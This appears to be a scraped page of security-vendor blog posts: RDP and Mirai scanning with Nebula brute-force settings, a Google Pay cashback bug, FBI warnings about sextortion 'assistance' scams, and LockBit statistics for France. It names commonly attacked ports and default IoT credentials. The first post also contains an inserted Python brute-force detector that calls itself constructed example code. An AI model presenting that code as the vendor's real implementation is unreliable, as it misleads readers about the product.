The two most common detections of compromised IP addresses are systems scanning for open RDP (Remote Desktop Protocol) ports and IoT (Internet of Things) botnets, such as Mirai.

Remote Desktop Protocol is exactly what the name implies, a tool for remotely controlling a PC that gives you all the power and control you would have if you were actually sitting behind it—which is what makes it so dangerous in the wrong hands. In fact, one of the primary attack vectors for ransomware attacks has been the Remote Desktop Protocol (RDP).

RDP port scanners, often found in the form of compromised servers, scan the internet for open RDP ports by trying the default port for RDP, TCP 3389. The cybercriminals that control the compromised server then try to brute-force their way in, repeatedly entering common username and password combos to find RDP login credentials.

Other than RDP, cybercriminals often perform port scans for various other network protocols, including FTP (20/21), POP3 (110/995), IMAP (143/993), SMTP (25/465/587), and SQL (1433/1434/3306). Gaining access through RDP and other network protocols allows attackers to infiltrate systems and deploy various malware.

Mirai, on the other hand, is a botnet primarily composed of Internet of Things (IoT) devices such as IP cameras, routers, and other internet-connected devices. Mirai actively scans the internet for open telnet servers on ports 23 or 2323, and, upon discovering one, attempts authentication using known default credentials. Such credentials are easy to find in many IoT devices—they’re often the prepackaged combination of “admin” and “admin” for both username and password whenever customers first purchase a product to set it up. 

If successful in its malicious login attempts, Mirai compromises the device and integrates it into the existing botnet.

In addition to launching DDoS attacks, botnets like Mirai can aid hackers in weakening website security, stealing credit card information, and distributing spam.

Protecting your business with Malwarebytes for Business

Malwarebytes for Business offers a comprehensive solution to monitor and manage threats, including detections from compromised IP addresses scanning for and attacking open ports.

For example, Malwarebytes blocks the IP address 5.39.37.10 as it is associated with the Mirai botnet, and 81.198.240.73 because it has been found to be involved in RDP probes or attacks.

Brute Force Protection policies in Nebula, our cloud-hosted security platform, can be configured to specify which protocols to protect, the ports used (default or custom), and create trigger rules. If set to monitor and detect, the policy will not block the ports. However, if set to block, it will utilize the Windows Firewall to block communications based on the configured rules.


When a block is implemented, the offending IP address will be placed in a “jail” for a predetermined duration, such as 30 minutes as shown in the example screenshot above. Blocks last a max of 60 minutes because IP addresses might be reassigned to legitimate users, or an attacker may leverage a legitimate user’s IP address. 

There are two kinds of inbound connections that Malwarebytes can detect, Blocked Inbound Connections and Found Inbound Connections.

Blocked inbound connections

Detections with the following fields reported typically occur when a port is open and exposed to the internet:

  • Type: Inbound Connection

  • Action Taken: Blocked

These detections are prevented by the Web Protection real-time protection layer. When these detections occur, it means the IP address being blocked is scanning or attempting to force its way into the endpoint using different ports.

Malwarebytes blocks IP addresses that have a history of abuse and is correctly preventing malicious connections.

Found inbound connections

Detections with the following fields reported are typically a result of having open ports in the router or firewall:

  • Type: Inbound Connection

  • Action Taken: Found

  • Detection Name: RDP Intrusion Detection

These detections occur based on your Brute Force Protection trigger rule settings specified in the Nebula policy.

Configuring Brute Force Protection in Nebula

To configure Brute Force Protection in Nebula:

  1. On the left navigation menu, go to Configure > Policies.

  2. Select a policy, then select the Brute Force Protection tab.

  3. Select the following protocols for your workstations or servers:

  • Workstation and server protocols: Check mark the RDP protocol.

  • Server-only protocols: Check mark the FTP, IMAP, MSSQL, POP3, SMTP, or SSH protocols.

  4. Configure custom port settings based on your endpoint environment and protocol requirements.

  5. Create a Trigger rule based on the number of failed remote login attempts within a certain minute range across all enabled protocols. Choose to either block the IP address or monitor and detect the event when the trigger threshold is reached.

  6. Optionally, enable the option to Prevent private network connections from being blocked. When enabled, endpoints within private network address ranges will not trigger Brute Force Protection due to failed login attempts. This excludes the following network ranges:

  • 10.0.0.0/8 (10.0.0.0-10.255.255.255)

  • 172.16.0.0/12 (172.16.0.0-172.31.255.255)

  • 192.168.0.0/16 (192.168.0.0-192.168.255.255)

  • 127.0.0.0/8 (127.0.0.0-127.255.255.255)

  7. Click Save at the top-right of your policy.
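To make the trigger rule, the time-limited “jail” and the private-range exclusion described above concrete, here is an added Python model of such a rule (example code written for this article, not Malwarebytes’ or Nebula’s implementation). The login events, IP addresses and the 5-failures-in-5-minutes threshold are constructed, and the detection-record labels it emits in block mode are an assumption.

```python
"""Minimal model of a Brute Force Protection trigger rule (added example,
not Malwarebytes/Nebula code). Failed remote logins are counted per source
IP inside a sliding window; at the threshold the IP is either jailed for a
bounded time (block mode) or just recorded (monitor mode). Private ranges
are exempt, mirroring the 'Prevent private network connections from being
blocked' option. All events, addresses and thresholds are constructed."""
from collections import defaultdict, deque
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Ranges excluded when private-network protection is enabled (from the policy steps).
PRIVATE_RANGES = [ip_network(n) for n in
                  ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
MAX_JAIL = timedelta(minutes=60)  # blocks never exceed 60 minutes, as stated above


@dataclass
class TriggerRule:
    protocol: str                  # e.g. "RDP"
    port: int                      # default or custom port for that protocol
    failures: int                  # this many failed logins ...
    window: timedelta              # ... within this period trips the rule
    action: str = "block"          # "block" or "monitor"
    jail: timedelta = timedelta(minutes=30)

    def __post_init__(self):
        self.jail = min(self.jail, MAX_JAIL)  # enforce the 60-minute ceiling


@dataclass
class Detector:
    rule: TriggerRule
    exempt_private: bool = True
    attempts: dict = field(default_factory=lambda: defaultdict(deque))
    jailed: dict = field(default_factory=dict)      # ip -> release time
    detections: list = field(default_factory=list)  # (ip, name, action taken)

    def is_jailed(self, ip: str, now: datetime) -> bool:
        release = self.jailed.get(ip)
        if release is None:
            return False
        if now >= release:  # jail expired: the address may belong to a legitimate user again
            del self.jailed[ip]
            return False
        return True

    def observe(self, ts: datetime, src_ip: str, port: int, success: bool) -> str:
        """Feed one login event (events must arrive in time order); returns the action taken."""
        if port != self.rule.port or success:
            return "ignored"
        if self.is_jailed(src_ip, ts):
            return "blocked"
        if self.exempt_private and any(ip_address(src_ip) in n for n in PRIVATE_RANGES):
            return "exempt"
        q = self.attempts[src_ip]
        q.append(ts)
        while q and ts - q[0] > self.rule.window:  # forget attempts outside the window
            q.popleft()
        if len(q) < self.rule.failures:
            return "counted"
        q.clear()
        # Name assumed to follow the "RDP Intrusion Detection" field shown above.
        name = f"{self.rule.protocol} Intrusion Detection"
        if self.rule.action == "block":
            self.jailed[src_ip] = ts + self.rule.jail
            self.detections.append((src_ip, name, "Blocked"))  # "Blocked" label is an assumption
            return "jailed"
        self.detections.append((src_ip, name, "Found"))
        return "found"


def run_sample(action: str = "block"):
    """Replay constructed RDP login failures against a 5-failures-in-5-minutes rule."""
    rule = TriggerRule("RDP", 3389, failures=5, window=timedelta(minutes=5), action=action)
    det = Detector(rule)
    t0 = datetime(2023, 4, 17, 9, 0, 0)
    # (offset seconds, source IP, port, success): constructed sample events
    events = [(i * 20, "203.0.113.5", 3389, False) for i in range(5)]    # 5 failures in 80 s
    events += [(i * 10, "192.168.1.20", 3389, False) for i in range(6)]  # internal host, exempt
    events += [(200, "203.0.113.5", 3389, False),    # retry while still jailed
               (210, "198.51.100.9", 22, False),     # SSH: not this rule's port
               (3700, "203.0.113.5", 3389, False)]   # retry after the 30-minute jail ended
    events.sort()
    results = [(ip, det.observe(t0 + timedelta(seconds=off), ip, port, ok))
               for off, ip, port, ok in events]
    return results, det.detections


if __name__ == "__main__":
    for ip, outcome in run_sample()[0]:
        print(f"{ip:15} {outcome}")
```

In block mode the external host is jailed on its fifth failure, refused while jailed, and counted afresh once the 30-minute jail has lapsed; the internal host never trips the rule because its range is exempt.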

Safeguarding your business from compromised threats

By leveraging Malwarebytes for Business’ advanced threat detection and protection capabilities, businesses can effectively protect themselves against attacks that result from compromised IP addresses and domains, including RDP attacks (and attacks against other network protocols) and IoT botnets. Configuring Brute Force Protection in Nebula allows companies to stay one step ahead of cybercriminals and ensure the safety of their networks and data.

Protection from port scanning attacks is only one aspect of Malwarebytes for Business’ multi-layered approach to defense, which includes an all-in-one endpoint security portfolio that combines 21 layers of protection.

Request Your Free Malwarebytes Business Trial 

Google Pay accidentally handed out free money, bug now fixed

Days ago, several Google Pay users in the US received some unexpected cashback from Google, congratulating them “for dogfooding the Google Pay Remittance experience”. Confused (and a tad happy), some looked to Twitter for answers, while others aired their experiences on the /r/googlepay/ Reddit page.

Freelance journalist Mishaal Rahman was one of the many recipients of free money. He got $46 in “rewards” from the app, while someone else got six rewards of almost $100 each.

“Open GPay, swipe to the ‘Deals’ tab, and see if you have any ‘rewards’ near the top. That’s where I’m seeing this,” Rahman tweeted. “I suspect this is an error, so that money is just gonna sit in my account for now lol.”

Not every Google Pay user received this welcome surprise, though.

Wait. Dogfooding?

Dogfooding is IT slang for using one’s own product. By this definition, these messages and cashback rewards seemed intended for individuals working at Google or for testing partners. Yet none of the recipients were either.

“It appears to be an unintended early launch, presumably it has something to do with the new price guarantee for flights,” replied a moderator to the thread on the Google Pay Reddit page. “Nothing to be worried about.”

The price guarantee the moderator referred to is a pilot program within Google Flights, Google’s online flight booking service. This program aims to pay back Flights users the difference, which must be greater than $5, between the flight price upon booking and the lowest ticket price via Google Pay.

This explanation sounds plausible. However, Google neither confirmed nor denied this to be the reason for the hiccup.

In a follow-up to Rahman and the many recipients of the cashback reward, the Google Pay team said the cash they received was unintended. The team also reversed the credit and reassured them no further action was required.

And, yes, if wrongfully rewarded users already transferred or spent the money they received, it’s theirs to keep, the team said.

The email Rahman received from the Google Pay team, telling him the free money he received was a mistake. (Source: Mishaal Rahman)



Sextortion “assistance” scammers con victims further

The FBI is warning of a particular aspect of sextortion scams: Supposed organisations that offer “help” to remove stolen images, often at a significant financial cost (and no guarantee of success).

Sextortion, the act of blackmailing individuals for cash in return for not leaking sensitive imagery and videos, has been a problem for many years. Sometimes it’s done by criminals, other times it’s by people known to the target. The imagery may be stolen from online cloud storage, leaked from a server, or obtained by compromising a PC with malware. The end result is the same: blackmail, and the threat of sending the images to friends and family, or just dumping them online.

A sub-industry of sorts has grown up around the sextortion marketplace: companies which can supposedly help you remove sextortion content or shut down blackmailers offer their services to those in need of assistance. These organisations may be contacted by the victims directly (for example, via adverts or search engine results) or they may make contact by another method.

The FBI believes at least some of these entities may be involved in sextortion attacks themselves. However you stack it up, these supposed businesses have no real way to get material taken offline and kept offline. Unless the people holding on to the stolen content are somehow chased offline forever, there’s nothing stopping them from putting it back or reconnecting with their target.

The whack-a-mole technique, and how “help” can make things worse

This is somewhat similar to those mugshot sites, which scrape mugshots and place them online along with the details of the person in the photograph. They offer to take them down, for a price, but more often than not once the victim pays up the images reappear on a related site and they’re back to square one.

As the FBI notes, law enforcement assistance is free (and there’s slightly more chance of the people responsible getting into trouble for their actions). Here are some examples provided by the FBI with regard to what bogus assistance looks like in practice, and how the “assistance” can make things worse:

  • A company solicited multiple payments totaling $5,000 from a juvenile sextortion victim after coercing the victim with threats of reputational harm, falsely indicating the victim would be unable to go to college or get a job and the victim’s parents would lose their jobs. The victim contacted the company for help after being sextorted via social media.
  • A juvenile sextortion victim contacted and hired a company for $2,000. When the victim declined to pay for additional services, the company told the victim the sextortion perpetrator asked for $5,000. At that point, the victim paid for the additional services, for which the company charged him an additional $3,200.
  • A company representative contacted the mother of a juvenile sextortion victim and offered to locate the sextortionist in exchange for $1,500. The representative also discouraged the victim’s mother from seeking assistance from law enforcement. It was not clear how the company representative knew about the sextortion or how they obtained the contact information for the victim’s mother.

Here at Malwarebytes, we’ve seen numerous examples of sextortion help advertised online which may (or more likely, may not) be of use to the person being targeted. Back in 2019 we spotted an ad making some bold claims about “keeping explicit images off the internet”. Sure, it might be legitimate, or it could just as easily be designed to suck someone in still further from a problem they can no longer escape. There’s never any real way to know for sure, and this is a primary reason why your first port of call should be law enforcement.

How to spot a sextortion assistance scam

The FBI has some recommendations when dealing with sextortion scams where anything assistance related is concerned. Supposed business entities may lean into your sense of fear, shame, and desperation to get the problem “solved”. In other words, they’ll act in a manner very similar to those performing the extortion in the first place. Signs to watch out for:

  • A company representative contacts you and offers assistance services for which the company charges fees;
  • The company advertises sextortion assistance in exchange for fees;
  • You are asked to pay the fees before the assistance services are rendered;
  • The company requires you to sign a contract for their services;
  • The company representative discourages you from contacting law enforcement or tells you contacting law enforcement is not the best way to get help;
  • The company uses high-pressure or scare tactics in an effort to secure your business; or
  • The for-profit company claims to be connected to government or law enforcement officials.

Malwarebytes tips for dealing with sextortion

We have many tips for all aspects of romance and sextortion attempts, and here are some of the main things you can do to help yourself avoid sextortion fraud:

  • Don’t panic. If a scammer tells you they have compromising images of you and they show you no evidence of the images, they probably don’t have any. Offering “proof” such as a password or phone number of yours just means they’ve got that data from a breach, and doesn’t mean they have access to your computer or webcam.
  • Don’t engage: report. If you’re shown evidence of stolen images, report to your local authorities and the FBI as soon as you can. Never engage with the sextortionist.
  • Be cautious about what you say to someone online. When asked certain questions, be vague and never give specifics. Remember that online, people can pretend to be someone they’re not, and can even look and sound like a different person with today’s technology.
  • Personalize your security and privacy settings. Lock down your accounts as much as you can, and keep as much hidden from public view as possible.
  • Data is typically forever. Remember that once you send something to someone—whether they’re a stranger, a romantic partner, relative, or friend—you have no control over where it goes next.


Ransomware in France, April 2022–March 2023

This article is based on research by Marcelo Rivero, Malwarebytes’ ransomware specialist, who monitors information published by ransomware gangs on their dark web sites. In this report, “known attacks” are attacks where the victim opted not to pay a ransom. This provides the best overall picture of ransomware activity, but the true number of attacks is far higher.

Between April 2022 and March 2023, France was one of the most attacked countries by ransomware gangs. During that period:

  • France was the fifth most attacked country in the world.
  • The government sector was attacked more often than in similar countries.
  • LockBit dominated the last twelve months, being used in 57% of known attacks.
  • There were almost twice as many LockBit attacks in France as in either the UK or Germany.

In July 2022, La Poste Mobile, a mobile carrier owned by French postal company La Poste, suffered a LockBit ransomware attack, severely impacting its administrative and management services. After successfully reducing the ransom demand from $1.4 million to $300,000 in a five-day negotiation, La Poste Mobile’s negotiator announced on July 11, “Management doesn’t want to pay anymore … it has reconsidered its decision.” LockBit published the data it had stolen on its leak site, describing it as “the private information of more than a million and a half people in France.”

The La Poste Mobile page on the LockBit leak site

In August 2022, attackers demanded $10 million after a ruthless assault on the Centre Hospitalier Sud Francilien (CHSF), a 1000-bed hospital near Paris. The disruption to CHSF’s computer systems resulted in patients having to be sent elsewhere, and surgeries having to be postponed.

A few months later, in mid-November, French defense and technology group Thales confirmed a data breach affecting contracts and partnerships in Malaysia and Italy. As with so many attacks in France in the last twelve months, the perpetrators used LockBit ransomware.

France is a prime target

In the 12 months from April 2022 to March 2023, France was a globally significant target for ransomware, and the fifth most attacked country by known attacks.

Known attacks in the ten most attacked countries, April 2022 – March 2023

Given the disparity between the USA and the rest of the world in terms of number of attacks, it would be easy to conclude that ransomware is, first and foremost, a USA problem. It is not. The size and nature of the US economy means that it has many more targets for ransomware gangs than the other countries in the top ten.

We can account for the difference in the size of countries’ economies by dividing the number of known ransomware attacks by a country’s nominal GDP, which gives us an approximate rate of attacks per $1T of economic output. On that basis, the difference between France and the USA is far smaller than the total number of known attacks would suggest. And while France and Germany suffered nearly identical numbers of known attacks, France appears to suffer a much higher rate of attacks per unit of economic activity than its neighbour.

The ten most attacked countries between April 2022 – March 2023, ordered by attacks per $1T GDP

The size of the countries in the top ten also varies enormously, and we can try to account for that by dividing known attacks by the size of each country’s population. On that measure, again, the differences between countries are far smaller than a simple count of known attacks suggests.

In all the variations of our top ten, English-speaking countries occupy at least three of the top five positions, which suggests that ransomware gangs have a slight bias for English-speaking targets. France sits just below the Anglosphere in a cluster of four advanced European economies suffering nearly identical rates of attacks per capita.

The ten most attacked countries between April 2022 – March 2023, ordered by attacks per capita

By any measure, France is one of the most attacked countries in the world, and its organisations are prime targets for ransomware gangs. Unusually, government targets accounted for a significant proportion of those organisations in the last twelve months. It was the country’s third most attacked sector, accounting for 9% of known attacks. By comparison, over the same twelve-month period, 4% of known attacks in the USA and 3% of known attacks in Germany affected their government sectors, while just 20 miles across the English Channel, the UK experienced none at all.

Known ransomware attacks by industry sector in France, April 2022 – March 2023

As is often the case, the reasons for this are not obvious. It is possible that this simply reflects the larger footprint of government in France—government spending accounts for a larger proportion of the economy in France than in either the UK or Germany. However, the difference is only a few percentage points.

Ransomware gangs often operate from the safe havens of Russia and the Commonwealth of Independent States, which can make it tempting to ascribe nationalistic or geopolitical motivations to their activity. However, the truth is they are businesses that choose targets that are easy to infiltrate and likely to pay substantial ransoms.

Unfortunately, the most likely explanation for the high proportion of government sector targets among the known attacks in France is that government institutions were easier targets in France than elsewhere.

LockBit’s hunting ground

The most dangerous ransomware in the world right now, is LockBit, and LockBit loves France.

In 2022, LockBit was used in 31% of known attacks globally, 3.5 times more than its nearest competitor, ALPHV. (You can read much more about why LockBit is the number one threat to your business in our 2023 State of Malware report.) As you’d expect, given its global preeminence, LockBit was also the most widely used ransomware in France, Germany, and the UK in the last twelve months.

However, LockBit dominates in France in a way that it doesn’t in its European neighbours. Between April 2022 and March 2023, LockBit accounted for an absolutely enormous 57% of known attacks in France. Over the same period, it accounted for 20% of known attacks in the UK and about 30% in Germany.

LockBit recorded 62 known attacks in France in the last twelve months, but no other gang registered more than seven. In the same period LockBit was responsible for 33 known attacks in the UK while six other gangs also got into double digits.

Ransomware with two or more known attacks in France, April 2022 – March 2023

LockBit’s outsized contribution to France’s misery is most clearly seen by highlighting its contribution on a month-by-month basis. The number of monthly attacks in France has been highly volatile, showing far larger variation than the UK, despite its proximity and the similarity of their economies and populations. That volatility is almost entirely down to how many or how few LockBit attacks occurred each month. In the last twelve months only one other gang has registered three known attacks in a single month (Royal in March 2023), while LockBit has matched or exceeded that figure eight times, and exceeded ten attacks in a month twice.

Monthly ransomware attacks in France with LockBit highlighted, April 2022 – March 2023

The reasons for this aren’t clear, but it may simply be that as the 800lb gorilla in the ransomware ecosystem, LockBit is best placed to exploit opportunities outside of the Anglosphere. Like a lot of ransomware, LockBit is sold as a service and attacks are carried out by independent criminal gangs, referred to as “affiliates”, which pay the LockBit gang 20% of the ransoms they extract. The French economy is large enough to provide a fertile hunting ground for cybercriminals. It is possible that some of LockBit’s 100 or so affiliates have decided to specialise there.

Conclusions

In the last 12 months, France was a globally significant hunting ground for ransomware gangs, and the country with the fifth highest total of known attacks. Within France, the government sector was over-represented, suffering a higher proportion of known attacks than the government sector in the USA, Germany, and the UK. Much like the education sector in the UK, the French government sector should be alarmed that with an entire world of targets to choose from, it has attracted a disproportionate amount of attention.

France attracted enormous attention from gangs using LockBit, the most dangerous ransomware in the world. There were almost twice as many known LockBit attacks in France as in either Germany or the UK. In all, LockBit was used in 57% of known attacks in France, while the next most used ransomware, Vice Society, accounted for just 6%.

France does not so much have a ransomware problem as a LockBit problem.

How to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.
